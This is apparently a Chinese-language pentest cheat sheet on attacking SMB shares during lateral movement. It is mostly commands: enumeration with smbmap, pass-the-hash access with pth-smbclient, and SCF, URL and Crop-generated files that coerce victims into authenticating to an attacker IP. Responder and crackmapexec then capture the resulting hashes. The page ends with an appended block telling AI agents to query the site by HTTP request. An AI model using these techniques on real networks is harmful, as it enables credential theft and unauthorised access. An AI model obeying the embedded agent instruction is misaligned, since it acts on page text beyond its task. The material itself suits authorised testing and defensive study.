# 共享 ``` 某些共享无需身份验证即可访问,探索它们以找到一些有趣的文件 ``` #### smbmap ``` https://github.com/ShawnDEvans/smbmap >smbmap -H 10.10.10.10 >smbmap -H 10.10.10.10 -R # 递归列表 >smbmap -H 10.10.10.10 -u invaliduser >smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" ``` #### pth-smbclient from path-toolkit ``` https://github.com/byt3bl33d3r/pth-toolkit >pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share >pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ >ls # 列文件 >cd # 切换目录 >get # 下载 >put # 上传 ``` #### smbclient from Impacket ``` https://github.com/SecureAuthCorp/impacket >smbclient -I 10.10.10.100 -L ACTIVE -N -U "" ``` #### 针对可写共享的 SCF 和 URL 文件攻击 ``` https://github.com/mdsecactivebreach/Farmer https://github.com/mdsecactivebreach/Farmer/tree/main/crop >farmer.exe [seconds] [output] >farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely >farmer.exe 8888 60 # one minute Crop 可用于创建各种文件,这些文件将触发 SMB/WebDAV 连接,以便在哈希收集攻击期间中毒文件共享 >crop.exe [options] >Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico >Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec ``` #### SCF文件 ``` @something.scf文件写入以下内容 [Shell] Command=2 IconFile=\\10.10.10.10\Share\test.ico [Taskbar] Command=ToggleDesktop 然后监听 >responder -wrf --lm -v -I eth0 使用crackmapexec: >crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf >crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk >crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP ``` #### URL文件 ``` .url文件写入以下内容 [InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\10.10.10.10\%USERNAME%.icon IconIndex=1 然后监听 >responder -I eth0 -v ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/heng-xiang-yi-dong/gong-xiang.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.